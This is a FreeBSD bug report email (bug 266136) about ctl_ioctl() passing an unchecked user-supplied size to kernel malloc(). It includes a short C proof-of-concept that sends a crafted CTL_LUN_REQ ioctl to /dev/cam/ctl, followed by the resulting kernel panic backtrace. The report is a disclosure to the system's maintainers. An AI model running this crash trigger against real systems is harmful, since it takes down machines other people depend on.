[Bug 266136] ctl_ioctl() passes user-supplied size directly to kernel malloc() -> potential crash

From: <bugzilla-noreply_at_freebsd.org>
Date: Wed, 31 Aug 2022 16:29:41 UTC

            Bug ID: 266136
           Summary: ctl_ioctl() passes user-supplied size directly to
                    kernel malloc() -> potential crash
           Product: Base System
           Version: CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: rtm@lcs.mit.edu

ctl_ioctl() in cam/ctl/ctl.c says, under CTL_LUN_REQ:

                if (lun_req->args != NULL) {
                        packed = malloc(lun_req->args_len, M_CTL, M_WAITOK);

lun_req->args_len is supplied by the user program, with no sanity check.
Some values will crash the kernel, e.g. 0xffffffffffffffff.

A demo:

int main() {
  int fd = open("/dev/cam/ctl", 2);
  if(fd < 0) { perror("/dev/cam/ctl"); exit(1); }
  char buf[512];
  memset(buf, 0, sizeof(buf));
  strcpy(buf, "block");
  *(unsigned long long *)(buf + 32 + 14*8) = 0x8000000000000000ull; // args
  *(unsigned long long *)(buf + 32 + 16*8) = 0xffffffffffffffffull; // args_len
  ioctl(fd, 0xc168e121, buf); // CTL_LUN_REQ

panic: Assertion size > 0 failed at
panic() at panic+0x2a
vmem_alloc() at vmem_alloc+0xc8
kmem_malloc_domain() at kmem_malloc_domain+0x54
kmem_malloc_domainset() at kmem_malloc_domainset+0x36
malloc_large() at malloc_large+0x2a
malloc() at malloc+0xf8
ctl_ioctl() at ctl_ioctl+0x958
devfs_ioctl() at devfs_ioctl+0xbe
vn_ioctl() at vn_ioctl+0xba
devfs_ioctl_f() at devfs_ioctl_f+0x20
fo_ioctl() at fo_ioctl+0xa
kern_ioctl() at kern_ioctl+0x242
sys_ioctl() at sys_ioctl+0x120
syscallenter() at syscallenter+0xec
ecall_handler() at ecall_handler+0x18
do_trap_user() at do_trap_user+0xea
cpu_exception_handler_user() at cpu_exception_handler_user+0x72

You are receiving this mail because:
You are the assignee for the bug.